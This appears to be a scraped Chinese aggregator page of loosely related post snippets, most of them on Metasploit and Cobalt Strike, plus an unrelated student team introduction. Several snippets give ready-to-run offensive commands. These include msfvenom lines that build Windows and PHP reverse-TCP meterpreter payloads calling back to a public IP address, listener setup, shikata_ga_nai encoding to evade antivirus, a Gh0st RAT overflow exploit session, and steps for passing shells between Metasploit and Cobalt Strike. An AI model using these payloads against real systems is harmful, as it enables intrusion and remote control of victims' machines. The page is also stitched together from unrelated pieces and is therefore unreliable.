msf

利用Gh0st 3.6远程溢出漏洞反向控制攻击者

廉价感情. 提交于 2020-01-12 22:06:43
title: 利用Gh0st 3.6远程溢出漏洞反向控制攻击者 comments: true toc: true categories: [Metasploit] [Exp] tags: Metasploit Overflow Gh0st date: 2020-01-12 18:30:10 abbrlink: 30568 前言 漏洞验证在2017年被公开,实际上Gh0st溢出漏洞在2009年时就已被人爆出过多个 可见使用开源C2工具,不见得安全,最好是经过二次修改,单纯做免杀可防不了哦 MSF Teston WinXP at 2017-09-15 运行Gh0st客户端,然后通过MSF溢出C2客户端机器,即可反向获取攻击者机器权限 msf > use exploit/windows/misc/gh0st msf exploit(gh0st) > set RHOST 192.168.1.126 RHOST => 192.168.1.126 msf exploit(gh0st) > run [*] Started reverse TCP handler on 192.168.1.125:4444 [*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6 [*] 192.168.1.126:80 - Spraying heap... [*]

软件网络15团队作业1

浪子不回头ぞ 提交于 2020-01-12 02:19:35
团队展示 1、队名 颜罗王team 2、队员学号(标记组长) 201521123002 林楚虹 201521123003 董美凤 201521123004 林艺如 201521123005 杨雪莹(组长) 201521123015 王华俊 3、拟作的团队项目描述 痛苦的开始,美好的结束 微信小程序开发 4、队员风采 林楚虹 风格: 我有吗? 乱,无固定模式 擅长的技术:C,Java 编程的兴趣:敲代码很开心的 希望的软工角色(开发、测试、PM等):开发 一句话宣言:多敲代码益智 MSF的理解:这是一套很完整的原则,从如何处理团队内部问题,到外部如何与客户合作都给了很好的建议。在内部要较强交流,要有共同的目标,分工上要各司其职。对外要和客户、用户多交流深刻理解他们的需求。然后还要注意在商品上要追求质量,开发时多学习前人的经验。 董美凤 风格:恣意洒脱 擅长的技术:C语言,java 编程的兴趣:界面设计,其他啥的目前还没挖掘出来 希望的软工角色(开发、测试、PM等):PM,感兴趣的最好 一句话宣言:Stay hungry,Stay foolish. MSF的理解:在MSF基本原则中,充分授权和信任是非常重要的,团队成员间是平等协作的关系,一个团队的组长要懂得如何合理分配任务给其组员,并且要给予充分的信任。个人认为在完成这次的团队项目很重要,但是更重要的是通过这样一段历程

Msf的一些常用操作

南笙酒味 提交于 2020-01-10 05:00:49
payload的几个常用生成 生成windows下的反弹木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe // -p < payload > -f < format> -o < path> = > 监听 use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.17.150.246 //阿里云云服务器这里是内网ip set LPORT 8888 exploit -j PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php use exploit/multi/handler set PAYLOAD php/meterpreter_reverse_tcp set LHOST 172.17.150.246 set LPORT 8888 exploit -j shellcode: msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60

Installing Metasploit Framework on OS X Yosemite, metasploit-framework -v '4.10.1.pre.dev' not found

孤者浪人 提交于 2020-01-06 02:20:37
问题 I am trying to install Metasploit Framework on OS X Yosemite and whilst running bundle install the installer gets stuck on trying to install metasploit-framework -v '4.10.1.pre.dev'. When I run gem install metasploit-framework -v '4.10.1.pre.dev' on it's own I get this error: ERROR: Could not find a valid gem 'metasploit-framework' (= 4.10.1.pre.dev) in any repository ERROR: Possible alternatives: test_framework, metasploit-yard, metasploit-runner, metasploit-erd, metasploit-concern Has

Metasploit用法大全

六眼飞鱼酱① 提交于 2019-12-29 07:43:40
Metasploit用户接口 msfconsole Armitage: KaliGUI启动;armitage命令启动 Metasploit功能程序 msfvenom 集成了载荷生成器、载荷编码器、空指令生成器的功能 查看详细指令选项:msfvenom-h 服务器消息块协议扫描 msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的MicrosoftSQLServer msf>useauxiliary/scanner/mssql/mssql_ping SSH服务器扫描 msf>useauxiliary/scanner/ssh/ssh_version FTP扫描 msf>useauxiliary/scanner/ftp/ftp_version,发现ftp服务器 msf>useauxiliary/scanner/ftp/anonymous,检查是否允许匿名登录 简单网管协议扫描 msf>useauxiliary/scanner/snmp/snmp_login 渗透攻击基础 msf>showexploits msf>showauxiliary msf>showoptions msf>showpayloads msf>showtargets info set和unset setg和unsetg save 你的第一次渗透攻击 操作机:KaliLinux

MSF——Payload模块(二)

谁说胖子不能爱 提交于 2019-12-28 02:01:35
MSF系列: MSF——基本使用和Exploit模块(一) MSF——Payload模块(二) MSF——Meterpreter(三) MSF——信息收集(四) 一、exploit和payload exploit是指利用漏洞的一个过程和方法,最终的目的是为了执行payload ,payload才是真正实现我们攻击的代码(获得shell等等) 以缓冲区溢出为例,exploit模块告诉你在寄存器中要填充多少个字符,让寄存器下一条指令执行的代码位置跳转到我们的payload上 在使用exploit时,我们都是用 use 去使用的,在exploit模块中,我们可以 set 调用各种payload 如果我们不想使用exploit,而是直接使用payload,我们也可以直接用 use 使用一个payload 一样可以通过show options查看有哪些参数需要设置 这里的 RHOST是指受害机器只接受某个远程主机来连接它的4444端口(4444是受害机器开放的端口) ,限制了来源IP,我们这里可以不用设置。但是如果被其他人扫到这个端口,他们也可以连接上去获得shell。 二、直接使用payload 一般我们是在exploit中调用payload,如果想直接使用payload,可以使用 generate 命令来生成payload。 如下图所示

Kali利用msf对MS10_061漏洞进行渗透测试

本小妞迷上赌 提交于 2019-12-27 16:42:01
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。 2.打印后台程序服务模拟漏洞(CVE-2010-2729/MS10-061) 利用MSF中的攻击模块:ms10_061_spoolss,Windows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录( %SystemRoot%\system32 )中创建文件。攻击者可以指定任何文件名,包括目录遍历,通过 WritePrinter 请求,攻击者可以完全控制创建文件的内容。将文件写入到Windows系统目录( %SystemRoot%\system32 )后,通过WMI来部署恶意程序,因为系统会自动运行 %SystemRoot%\System32\Wbem\MOF 文件夹的mof文件、执行命令。 该漏洞首次被发现并被利用于著名的

cobalt strike笔记-CS与MSF,Armitage,Empire互转shell

蹲街弑〆低调 提交于 2019-12-26 18:57:56
0x01 Metasploit派生shell给Cobaltstrike 生成木马: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.5.4 LPORT=4444 -f exe > test.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai succeeded with size 395 (iteration=1) x86/shikata_ga_nai succeeded with size 422 (iteration=2) x86/shikata_ga_nai

How can I remove null bytes from my object code?

本小妞迷上赌 提交于 2019-12-23 04:32:32
问题 I want to use my own shellcode for a buffer overflow exploit so for that I have written a script in C language[shellcode script]. I have used the following commands.: gcc -c file.c -o file.o objdump -sS -D file.o root@kali:~/shellcode# cat file.c #include<stdio.h> int main() { printf("Hi"); } The above code is of 'file.c'. I expect the output of the 'objdump -sS -D file.o' to be free from null-bytes, but actually this is my output after typing that command: file.o: file format elf64-x86-64

metasploit与Cobaltstrike互相派生shell

会有一股神秘感。 提交于 2019-12-20 17:44:57
msf 派生 shell 给 Cobalt strike(前提有一个meterpreter) msf exploit(handler) > use exploit/windows/local/payload_inject   msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http   msf exploit(payload_inject) > set DisablePayloadHandler true   msf exploit(payload_inject) > set LHOST 192.168.229.143   msf exploit(payload_inject) > set LPORT 1212   msf exploit(payload_inject) > set SESSION 1   msf exploit(payload_inject) > exploit Cobalt strike 派生 shell 给 MSF(前提有个beaconshell) msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload =>